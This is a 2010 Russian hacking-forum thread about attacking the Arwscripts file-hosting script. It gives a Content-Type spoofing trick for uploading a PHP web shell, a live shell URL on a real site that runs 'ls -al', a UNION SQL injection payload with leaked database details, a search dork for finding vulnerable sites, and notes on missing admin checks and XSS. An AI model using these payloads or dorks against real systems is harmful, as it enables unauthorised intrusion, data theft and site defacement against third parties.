Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Arwscripts File Hosting Script (https://forum.antichat.xyz/showthread.php?t=229916)

Ponchik 15.09.2010 20:12

Тестил вот этот, зануленый

http://www.nulled.ws/attachment.php?attachmentid=15074&d=1225918711

Реги там нет, сам невижу что там, мне emillord дал ссыль на свой обменик, я захекал

Заливаем .php файл с phpinfo() и скачиваем, предлагает сохранить, но там будет результат

Если скрипт ругается, что недопустимый тип:

Скрипт берёт mime type из массива $_FILES а там mime type берётся из вашего запроса к серверу, сниффаем, меняем

Content-Type: ocet/stream (или чего оно там у вас)

на

Content-Type: text/plain

пых файл заливается, запускается... всё

исходники вам показать немогу, лень и нет у меня их, нет реги на нулледе, но emillord сказал он тама качал

ну как-то так...

===========

дорк inurl:view-file.html?file=

первая ссылка - ломаеца как задумывалось

токо я из phpinfo взял прямой путь, вот

http://www.sharefile.org/storage/1iecwexb3ibhfsc2ubceacg7zwitr5.php?c=echo%20'%3Cpr e%3E';system('ls%20-al');%20exit;

какой-то школьник снёс

Ponchik 15.09.2010 20:39

Ну вон оно

process-multi-upload.php

какая-то там строка

$contenttype = $_FILES['Filedata']['type'];

Тама ещё по ходу и скуля....

view-file.html

PHP код:

PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$file_ex[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$file_ex[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

...

[/
COLOR][COLOR="#0000BB"]$get_file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT dateadded, originalfilename, filename, filesize, password, description, originalext, totalviews, status FROM files WHERE id = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" LIMIT 1"[/COLOR][COLOR="#007700"]);

[/
COLOR][/COLOR

но мне лень щупать да и зачем если шелл льётся

Любопытство сильнее лени

view-file.html?file=-1%20UNION%20SELECT%20null,null,null,null,null,conc at_ws(0x3a,version(),database(),user()),null,null, null%23

Код:

Code:
http://www.sharefile.org/view-file.html?file=-1%20UNION%20SELECT%20null,null,null,null,null,concat_ws(0x3a,version(),database(),user()),null,null,null%23

Код:

Code:
Comments: 5.0.67-community:admin_sharefileorg:admin_juzi@localhost

вот так например

А ещё там есть проверка на

$_SESSION[sess_isadmin] == 'yes'

через соседей если подменим сессию, будем одминами...

Но нафиг надо

А ещё при register_globals в footer.php XSS

$site_url,$site_name,$theme_path(нет, не инклуд... по крайней мере не в этом файле)

Всё, я срочно убежал гамать

таки вернулся...

admin-ban-ip.html

нет проверки на админство... ну он где-то есть, но я не стал искать, в скрипт сначала делает, потом проверяет

Ну короче

admin-ban-ip.html?banipsubmit=1&banip=1.1.1.1 - забаним ip 1.1.1.1

будет редирект, но IP Добавится

открыл следующий файл - скуля... и удаление файлов

admin-home.html?d={SQL или ID файла} - удалит ID и SQL Inj

не, это уже извращенство, смысла щупать нет, там всё дырявое

Rebz 16.09.2010 19:16

Тема спущена с РОА


Время: 15:39